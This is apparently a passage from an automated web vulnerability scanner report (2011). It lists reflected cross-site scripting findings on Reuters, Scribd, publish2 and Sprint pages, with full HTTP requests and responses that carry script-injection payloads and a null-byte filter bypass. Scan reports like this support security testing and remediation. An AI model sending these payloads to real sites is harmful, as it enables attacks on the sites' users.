Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: kohanasession=tjqibcmmv4ife4uj4v539uolt4; path=/
P3P: CP="CAO CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Set-Cookie: kohanasession_data=6pJEXIffSQeOxbFJRglsy1N3NgAhoMtdMg0KP5%2FMCS1HfmmNr3Jc4UrzwEAcqYQmxttgfAUC5fWHasy3%2BuUKcK8VH6PA6LJDnKm7GUG5M2J4HcEhb1cmLD%2BcGlocHzy%2BCA9ycFwrZSyf0cgynGrESRtIEbKRNRQaYkO4C%2Fv5KAGduUZjFPmMge%2FgVEePPdgA4mh8yj%2BAIeKVACzUCrRiBNj9hNLQSZ0ghY8I6b4OznDrCm5FrRwQnZJhEFCHdBWAq%2Fx86YMPs5UBVGGQxwwWchEqVUJ%2FGREixrecBVlbcJeKUI4C9af0OM1EbMfYd7amL26MSFTPGwXfLudqJ79Rg%2FfJOPurn0yLy8smVyr16RKXJ9PPEWZT; path=/
Content-Type: application/json; charset=utf-8
Content-Length: 12581

jQuery15205311797398608178_1315097321812({"title":"State Worker","feedlink":"http:\/\/www.publish2.com\/newsgroups\/state-worker.js?jsonp_callback=jQuery15205311797398608178_1315097321812&_=1315097336789aede9<a>fb44affacea","sitelink":"http:\/\/www.publish2.com\/","description":"Links of interest to California state workers and those who follow the bureaucracy.","last_build_date":"Sun, 04 Sep 2011 01:03:22 +0000","total
...[SNIP]...

5.74. http://www.publish2.com/newsgroups/state-worker.js [jsonp_callback parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.publish2.com
Path:	/newsgroups/state-worker.js

Issue detail

The value of the jsonp_callback request parameter is copied into the HTML document as plain text between tags. The payload 442ea<script>alert(1)</script>060310a8b2e was submitted in the jsonp_callback parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /newsgroups/state-worker.js?jsonp_callback=jQuery15205311797398608178_1315097321812442ea<script>alert(1)</script>060310a8b2e&_=1315097336789 HTTP/1.1
Host: www.publish2.com
Proxy-Connection: keep-alive
Referer: http://blogs.sacbee.com/the_state_worker/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 01:03:17 GMT
Server: Apache
X-Powered-By: PHP/5.2.13
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: kohanasession=f54702b4i9nutq0ri22oj2ip01; path=/
P3P: CP="CAO CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Set-Cookie: kohanasession_data=UjRvqJa9Eqx5QsHwXvtTAMlRPn1qqiKkaBofe%2BXITQxJQ4qocxvavqYqKhREHwrdbOrJ%2Fu8dghXYIhnb1PK%2FGa1yI4z2ClG0Tr36e08qdUGK5giXu45KviCKOjymZvAh4QGtRmz2puRlWEtbuX1soBcVfTsIym4QT2GSrDqo%2BPeyfoSk2SBwg%2FPiQFu5IjmNBMie2n0Yt5zUdDiHp2S17Kji7v%2FOnij3QnRVk%2FbdtToibIVs9BxzVpMsNVOzvOwfJ4HCZUN7pPZ1fQ9PLRxdUjlkK24nF2Aw61jWyLwlzyPsKyWYqdwwSg6YRn1nT9xutqwdXuK7syz026lFuBxN0fqCRL05hslZvNWzYkYAJe6Bf%2BEfmGgg; path=/
Content-Type: application/json; charset=utf-8
Content-Length: 12645

jQuery15205311797398608178_1315097321812442ea<script>alert(1)</script>060310a8b2e({"title":"State Worker","feedlink":"http:\/\/www.publish2.com\/newsgroups\/state-worker.js?jsonp_callback=jQuery15205311797398608178_1315097321812442ea<script>
...[SNIP]...

5.75. http://www.publish2.com/newsgroups/state-worker.js [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.publish2.com
Path:	/newsgroups/state-worker.js

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload %00d2877<a>a00f557732f was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as d2877<a>a00f557732f in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.

Remediation detail

Request

GET /newsgroups/state-worker.js?jsonp_callback=jQuery15205311797398608178_1315097321812&_=1315097336789&%00d2877<a>a00f557732f=1 HTTP/1.1
Host: www.publish2.com
Proxy-Connection: keep-alive
Referer: http://blogs.sacbee.com/the_state_worker/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 01:03:41 GMT
Server: Apache
X-Powered-By: PHP/5.2.13
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: kohanasession_data=deleted; expires=Sat, 04-Sep-2010 01:03:40 GMT; path=/
Set-Cookie: kohanasession=lbcsf8itchvlv8shikh8vhsdd6; path=/
P3P: CP="CAO CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Set-Cookie: kohanasession_data=byTxifj9sEuzmxkMB8HE9YLK6MkctiF77DZp6uQNjjPv8OHj9z3%2BTnkuRPNaIkM1Y9s1dqvSPGjs%2Bl90USsr7gr2FyFio9LpVYl5Y8nEt6peSvTt0E3QrkSbCp2vOGTii43s1DJ8pYmHK0KAyzjjo8VYWSqpNRlRCPmC7U8XtLZxuyGorYN34pUhKXPsOsNPZeszXIuXuTEpTAANTbLF8jSJ381L%2Bm818ESSYQp7PoBNsFAzcfs5c2%2Bv%2Bcv289Y0SbCOt8RtoliIrBcO4k4K6Gpekg0mtI9J5xTagcGLjR4SVdCtabQkmnKxH4mRUA%2FLSSFn5%2BXFADxk6pFLiNQHeuHamh7A28%2Bups3KhR9eXN0UJv1LnAAc; path=/
Content-Type: application/json; charset=utf-8
Content-Length: 12587

jQuery15205311797398608178_1315097321812({"title":"State Worker","feedlink":"http:\/\/www.publish2.com\/newsgroups\/state-worker.js?jsonp_callback=jQuery15205311797398608178_1315097321812&_=1315097336789&%00d2877<a>a00f557732f=1","sitelink":"http:\/\/www.publish2.com\/","description":"Links of interest to California state workers and those who follow the bureaucracy.","last_build_date":"Sun, 04 Sep 2011 01:03:42 +0000","tot
...[SNIP]...

5.76. http://www.reuters.com/assets/commentsChild [articleId parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.reuters.com
Path:	/assets/commentsChild

Issue detail

The value of the articleId request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 42c07"><script>alert(1)</script>e18cfb78b21 was submitted in the articleId parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /assets/commentsChild?canonical_article_id=/article/2011/09/04/us-weather-football-idUSTRE78222D20110904&articleId=USTRE78222D2011090442c07"><script>alert(1)</script>e18cfb78b21&headline=Notre+Dame%2C+Michigan+stadiums+cleared+due+to+storms&channel=domesticNews&edition=BETAUS&view=base HTTP/1.1
Host: www.reuters.com
Proxy-Connection: keep-alive
Referer: http://www.reuters.com/article/2011/09/04/us-weather-football-idUSTRE78222D20110904
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __qseg=Q_D|Q_T; RE_USERID=9da0587b-a65b-4bca-a7de-c321e48d355a; _tr_ref.6e08dd17=1315097066.http%3A%2F%2Fwww.google.com%2Ftrends%2Fhottrends%3Fq%3Dnotre%2Bdame%2Bfootball%26date%3D2011-9-3%26sa%3DX; _tr_id.6e08dd17=88dc7998fd25ddac.1315097066.1.1315097066.1315097066; _tr_ses.6e08dd17=1315097065832; _tr_cv.6e08dd17=false; adops_master_kvs=xa%3Dn%3B; xa=xa%3Dn%3B; WT_FPC=id=50.23.123.106-4086325760.30173190:lv=1315115075506:ss=1315115075506; rsi_segs=I07714_10272|I07714_10273|I07714_10456; __utma=108768797.906251454.1315097076.1315097076.1315097076.1; __utmb=108768797.1.10.1315097076; __utmc=108768797; __utmz=108768797.1315097076.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=notre%20dame%20football; tns=dataSource=cookie

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 00:51:41 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Vary: Accept-Encoding
Content-Length: 4900



<!--[if !IE]> token: 892733d4-f219-4aaf-a26f-4ff2daae13fd <
...[SNIP]...
<input type="hidden" name="article_id" value="USTRE78222D2011090442c07"><script>alert(1)</script>e18cfb78b21" />
...[SNIP]...

5.77. http://www.reuters.com/assets/commentsChild [channel parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.reuters.com
Path:	/assets/commentsChild

Issue detail

The value of the channel request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload de11a"><script>alert(1)</script>663f7664906 was submitted in the channel parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /assets/commentsChild?canonical_article_id=/article/2011/09/04/us-weather-football-idUSTRE78222D20110904&articleId=USTRE78222D20110904&headline=Notre+Dame%2C+Michigan+stadiums+cleared+due+to+storms&channel=domesticNewsde11a"><script>alert(1)</script>663f7664906&edition=BETAUS&view=base HTTP/1.1
Host: www.reuters.com
Proxy-Connection: keep-alive
Referer: http://www.reuters.com/article/2011/09/04/us-weather-football-idUSTRE78222D20110904
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __qseg=Q_D|Q_T; RE_USERID=9da0587b-a65b-4bca-a7de-c321e48d355a; _tr_ref.6e08dd17=1315097066.http%3A%2F%2Fwww.google.com%2Ftrends%2Fhottrends%3Fq%3Dnotre%2Bdame%2Bfootball%26date%3D2011-9-3%26sa%3DX; _tr_id.6e08dd17=88dc7998fd25ddac.1315097066.1.1315097066.1315097066; _tr_ses.6e08dd17=1315097065832; _tr_cv.6e08dd17=false; adops_master_kvs=xa%3Dn%3B; xa=xa%3Dn%3B; WT_FPC=id=50.23.123.106-4086325760.30173190:lv=1315115075506:ss=1315115075506; rsi_segs=I07714_10272|I07714_10273|I07714_10456; __utma=108768797.906251454.1315097076.1315097076.1315097076.1; __utmb=108768797.1.10.1315097076; __utmc=108768797; __utmz=108768797.1315097076.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=notre%20dame%20football; tns=dataSource=cookie

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 00:52:03 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Vary: Accept-Encoding
Content-Length: 5213



<!--[if !IE]> token: 07237ae1-8f58-470a-bbcb-d116e1992d4f <
...[SNIP]...
<input type="hidden" name="channel" value="domesticNewsde11a"><script>alert(1)</script>663f7664906" />
...[SNIP]...

5.78. http://www.reuters.com/assets/newsFlash [&flashPath parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.reuters.com
Path:	/assets/newsFlash

Issue detail

The value of the &flashPath request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 6e58d'%3balert(1)//87be1ff7cb was submitted in the &flashPath parameter. This input was echoed as 6e58d';alert(1)//87be1ff7cb in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /assets/newsFlash?&flashPath=http://sales.reuters.com/pitches/roughcuts/rc728x90.swf%3FclickTag%3Dhttp%253A//www.reuters.com/%26channelName%3D16e58d'%3balert(1)//87be1ff7cb&vcount=1&videoChannel=1&w=728&h=90&akamaize=n&gifPath=http%3A//sales.reuters.com/pitches/roughcuts/rc728x90.gif&clickTag=http%3A//www.reuters.com/ HTTP/1.1
Host: www.reuters.com
Proxy-Connection: keep-alive
Referer: http://www.reuters.com/article/2011/09/04/us-weather-football-idUSTRE78222D20110904
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __qseg=Q_D|Q_T; RE_USERID=9da0587b-a65b-4bca-a7de-c321e48d355a; _tr_ref.6e08dd17=1315097066.http%3A%2F%2Fwww.google.com%2Ftrends%2Fhottrends%3Fq%3Dnotre%2Bdame%2Bfootball%26date%3D2011-9-3%26sa%3DX; _tr_id.6e08dd17=88dc7998fd25ddac.1315097066.1.1315097066.1315097066; _tr_ses.6e08dd17=1315097065832; _tr_cv.6e08dd17=false; adops_master_kvs=xa%3Dn%3B; xa=xa%3Dn%3B; WT_FPC=id=50.23.123.106-4086325760.30173190:lv=1315115075506:ss=1315115075506; rsi_segs=I07714_10272|I07714_10273|I07714_10456; __utma=108768797.906251454.1315097076.1315097076.1315097076.1; __utmb=108768797.1.10.1315097076; __utmc=108768797; __utmz=108768797.1315097076.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=notre%20dame%20football; tns=dataSource=cookie

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 00:50:24 GMT
Server: Apache-Coyote/1.1
Last-UpdatedL: Sun, 04 Sep 2011 00:41:38 GMT
Content-Type: text/html;charset=UTF-8
Vary: Accept-Encoding
Content-Length: 10745



<!--[if !IE]> token: 75d68b0e-7e26-420d-a60c-5ba564f496b3 <
...[SNIP]...
ockwave/cabs/flash/swflash.cab#version=7,0,0,0',
           'width', '728',
           'height', '90',
           'src', 'http://sales.reuters.com/pitches/roughcuts/rc728x90?clickTag=http%3A//www.reuters.com/&channelName=16e58d';alert(1)//87be1ff7cb',
           'quality', 'high',
           'pluginspage', 'http://www.macromedia.com/go/getflashplayer',
           'align', 'middle',
           'wmode', 'transparent',
           'id', 'flash',
           'bgcolor', '#ffffff',
           'name', '
...[SNIP]...

5.79. http://www.reuters.com/assets/newsFlash [&flashPath parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.reuters.com
Path:	/assets/newsFlash

Issue detail

The value of the &flashPath request parameter is copied into an HTML comment. The payload a467f--><script>alert(1)</script>ce7cfc0e2c5 was submitted in the &flashPath parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /assets/newsFlash?&flashPath=http://sales.reuters.com/pitches/roughcuts/rc728x90.swf%3FclickTag%3Dhttp%253A//www.reuters.com/%26channelName%3D1a467f--><script>alert(1)</script>ce7cfc0e2c5&vcount=1&videoChannel=1&w=728&h=90&akamaize=n&gifPath=http%3A//sales.reuters.com/pitches/roughcuts/rc728x90.gif&clickTag=http%3A//www.reuters.com/ HTTP/1.1
Host: www.reuters.com
Proxy-Connection: keep-alive
Referer: http://www.reuters.com/article/2011/09/04/us-weather-football-idUSTRE78222D20110904
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __qseg=Q_D|Q_T; RE_USERID=9da0587b-a65b-4bca-a7de-c321e48d355a; _tr_ref.6e08dd17=1315097066.http%3A%2F%2Fwww.google.com%2Ftrends%2Fhottrends%3Fq%3Dnotre%2Bdame%2Bfootball%26date%3D2011-9-3%26sa%3DX; _tr_id.6e08dd17=88dc7998fd25ddac.1315097066.1.1315097066.1315097066; _tr_ses.6e08dd17=1315097065832; _tr_cv.6e08dd17=false; adops_master_kvs=xa%3Dn%3B; xa=xa%3Dn%3B; WT_FPC=id=50.23.123.106-4086325760.30173190:lv=1315115075506:ss=1315115075506; rsi_segs=I07714_10272|I07714_10273|I07714_10456; __utma=108768797.906251454.1315097076.1315097076.1315097076.1; __utmb=108768797.1.10.1315097076; __utmc=108768797; __utmz=108768797.1315097076.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=notre%20dame%20football; tns=dataSource=cookie

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 00:50:28 GMT
Server: Apache-Coyote/1.1
Last-UpdatedL: Sun, 04 Sep 2011 00:41:38 GMT
Content-Type: text/html;charset=UTF-8
Vary: Accept-Encoding
Content-Length: 10796



<script>alert(1)</script>ce7cfc0e2c5 -->
...[SNIP]...

5.80. http://www.reuters.com/assets/newsFlash [h parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.reuters.com
Path:	/assets/newsFlash

Issue detail

The value of the h request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 669f1'%3balert(1)//52a8ec3cf2b was submitted in the h parameter. This input was echoed as 669f1';alert(1)//52a8ec3cf2b in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /assets/newsFlash?&flashPath=http://sales.reuters.com/pitches/roughcuts/rc728x90.swf%3FclickTag%3Dhttp%253A//www.reuters.com/%26channelName%3D1&vcount=1&videoChannel=1&w=728&h=90669f1'%3balert(1)//52a8ec3cf2b&akamaize=n&gifPath=http%3A//sales.reuters.com/pitches/roughcuts/rc728x90.gif&clickTag=http%3A//www.reuters.com/ HTTP/1.1
Host: www.reuters.com
Proxy-Connection: keep-alive
Referer: http://www.reuters.com/article/2011/09/04/us-weather-football-idUSTRE78222D20110904
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __qseg=Q_D|Q_T; RE_USERID=9da0587b-a65b-4bca-a7de-c321e48d355a; _tr_ref.6e08dd17=1315097066.http%3A%2F%2Fwww.google.com%2Ftrends%2Fhottrends%3Fq%3Dnotre%2Bdame%2Bfootball%26date%3D2011-9-3%26sa%3DX; _tr_id.6e08dd17=88dc7998fd25ddac.1315097066.1.1315097066.1315097066; _tr_ses.6e08dd17=1315097065832; _tr_cv.6e08dd17=false; adops_master_kvs=xa%3Dn%3B; xa=xa%3Dn%3B; WT_FPC=id=50.23.123.106-4086325760.30173190:lv=1315115075506:ss=1315115075506; rsi_segs=I07714_10272|I07714_10273|I07714_10456; __utma=108768797.906251454.1315097076.1315097076.1315097076.1; __utmb=108768797.1.10.1315097076; __utmc=108768797; __utmz=108768797.1315097076.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=notre%20dame%20football; tns=dataSource=cookie

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 00:50:52 GMT
Server: Apache-Coyote/1.1
Last-UpdatedL: Sun, 04 Sep 2011 00:41:38 GMT
Content-Type: text/html;charset=UTF-8
Vary: Accept-Encoding
Content-Length: 10692



<!--[if !IE]> token: e8324ba3-74c3-4fec-b687-322963413326 <
...[SNIP]...

   } else {
       // embed the flash movie
       AC_FL_RunContent(
           'codebase', 'http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab#version=7,0,0,0',
           'width', '728',
           'height', '90669f1';alert(1)//52a8ec3cf2b',
           'src', 'http://sales.reuters.com/pitches/roughcuts/rc728x90?clickTag=http%3A//www.reuters.com/&channelName=1',
           'quality', 'high',
           'pluginspage', 'http://www.macromedia.com/go/getflashpla
...[SNIP]...

5.81. http://www.reuters.com/assets/newsFlash [w parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.reuters.com
Path:	/assets/newsFlash

Issue detail

The value of the w request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 783fd'%3balert(1)//f2696c00016 was submitted in the w parameter. This input was echoed as 783fd';alert(1)//f2696c00016 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /assets/newsFlash?&flashPath=http://sales.reuters.com/pitches/roughcuts/rc728x90.swf%3FclickTag%3Dhttp%253A//www.reuters.com/%26channelName%3D1&vcount=1&videoChannel=1&w=728783fd'%3balert(1)//f2696c00016&h=90&akamaize=n&gifPath=http%3A//sales.reuters.com/pitches/roughcuts/rc728x90.gif&clickTag=http%3A//www.reuters.com/ HTTP/1.1
Host: www.reuters.com
Proxy-Connection: keep-alive
Referer: http://www.reuters.com/article/2011/09/04/us-weather-football-idUSTRE78222D20110904
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __qseg=Q_D|Q_T; RE_USERID=9da0587b-a65b-4bca-a7de-c321e48d355a; _tr_ref.6e08dd17=1315097066.http%3A%2F%2Fwww.google.com%2Ftrends%2Fhottrends%3Fq%3Dnotre%2Bdame%2Bfootball%26date%3D2011-9-3%26sa%3DX; _tr_id.6e08dd17=88dc7998fd25ddac.1315097066.1.1315097066.1315097066; _tr_ses.6e08dd17=1315097065832; _tr_cv.6e08dd17=false; adops_master_kvs=xa%3Dn%3B; xa=xa%3Dn%3B; WT_FPC=id=50.23.123.106-4086325760.30173190:lv=1315115075506:ss=1315115075506; rsi_segs=I07714_10272|I07714_10273|I07714_10456; __utma=108768797.906251454.1315097076.1315097076.1315097076.1; __utmb=108768797.1.10.1315097076; __utmc=108768797; __utmz=108768797.1315097076.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=notre%20dame%20football; tns=dataSource=cookie

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 00:50:45 GMT
Server: Apache-Coyote/1.1
Last-UpdatedL: Sun, 04 Sep 2011 00:41:38 GMT
Content-Type: text/html;charset=UTF-8
Vary: Accept-Encoding
Content-Length: 10692



<!--[if !IE]> token: b80bcee9-8c35-4d7a-945c-b4822a95f4d5 <
...[SNIP]...
ML output folder.");
   } else {
       // embed the flash movie
       AC_FL_RunContent(
           'codebase', 'http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab#version=7,0,0,0',
           'width', '728783fd';alert(1)//f2696c00016',
           'height', '90',
           'src', 'http://sales.reuters.com/pitches/roughcuts/rc728x90?clickTag=http%3A//www.reuters.com/&channelName=1',
           'quality', 'high',
           'pluginspage', 'http://www.macromedi
...[SNIP]...

5.82. http://www.reuters.com/assets/searchIntercept [blob parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.reuters.com
Path:	/assets/searchIntercept

Issue detail

The value of the blob request parameter is copied into the HTML document as plain text between tags. The payload ae54f<script>alert(1)</script>793ad682c63 was submitted in the blob parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /assets/searchIntercept?blob=ae54f<script>alert(1)</script>793ad682c63 HTTP/1.1
Host: www.reuters.com
Proxy-Connection: keep-alive
Referer: http://www.reuters.com/article/2011/09/04/us-weather-football-idUSTRE78222D20110904
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: RE_USERID=9da0587b-a65b-4bca-a7de-c321e48d355a; _tr_ref.6e08dd17=1315097066.http%3A%2F%2Fwww.google.com%2Ftrends%2Fhottrends%3Fq%3Dnotre%2Bdame%2Bfootball%26date%3D2011-9-3%26sa%3DX; xa=xa%3Dn%3B; tns=dataSource=cookie; __qseg=Q_D|Q_T; adops_master_kvs=xa%3Dn%3B; WT_FPC=id=50.23.123.106-4086325760.30173190:lv=1315115328770:ss=1315115075506; _tr_id.6e08dd17=88dc7998fd25ddac.1315097066.1.1315097330.1315097066; _tr_ses.6e08dd17=1315097065832; _tr_cv.6e08dd17=false; snas_noinfo=1; __utma=108768797.906251454.1315097076.1315097076.1315097076.1; __utmb=108768797.2.10.1315097076; __utmc=108768797; __utmz=108768797.1315097076.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=notre%20dame%20football; rsi_segs=I07714_10272|I07714_10273

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 01:04:47 GMT
Server: Apache-Coyote/1.1
Expires: Sun, 4 Sep 2011 01:04:47 GMT
Content-Type: text/html;charset=UTF-8
Vary: Accept-Encoding
Content-Length: 553



<!--[if !IE]> token: 4baec32d-d2a8-4ee9-bf4a-c3739e992737 <
...[SNIP]...
<div class="searchTerm">"ae54f<script>alert(1)</script>793ad682c63"</div>
...[SNIP]...

5.83. http://www.scribd.com/embeds/63688924/content [start_page parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.scribd.com
Path:	/embeds/63688924/content

Issue detail

The value of the start_page request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 4bf51</script><script>alert(1)</script>3cb4a3abca9 was submitted in the start_page parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /embeds/63688924/content?start_page=14bf51</script><script>alert(1)</script>3cb4a3abca9&view_mode=list&access_key=key-2mw49i3od1t7hxagubzd HTTP/1.1
Host: www.scribd.com
Proxy-Connection: keep-alive
Referer: http://blogs.sacbee.com/the_state_worker/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: nginx/0.8.54
Date: Sun, 04 Sep 2011 00:55:58 GMT
Content-Type: text/html; charset=utf-8
Connection: keep-alive
Vary: Accept-Encoding
X-Powered-By:
X-Runtime: 48ms
Status: 200 OK
X-Cache: MISS from squid03.local
Via: 1.1 squid03.local:3128 (squid/2.7.STABLE9)
Expires: Sun, 04 Sep 2011 00:55:57 GMT
Cache-Control: no-cache
X-Debug: Embed with squid
Content-Length: 9516

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" xmlns:fb="http://www.fa
...[SNIP]...
<script type="text/javascript">window.manager = new Scribd.Embeds.Content({"branded_logo":null,"page_count":5,"start_page":"14bf51</script><script>alert(1)</script>3cb4a3abca9","view_mode":"scroll","from_jsapi":false,"document":{"num_pages":5,"title":"Summary of State Collective Bargaining Agreements ","id":63688924}});</script>
...[SNIP]...

5.84. https://www.sprint.net/min/ [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	https://www.sprint.net
Path:	/min/

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 27e50"><script>alert(1)</script>d3106908dc was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /min27e50"><script>alert(1)</script>d3106908dc/?f=css/global.css,compass_ui/css/smoothness/jquery-ui-1.8.2.custom.css HTTP/1.1
Host: www.sprint.net
Connection: keep-alive
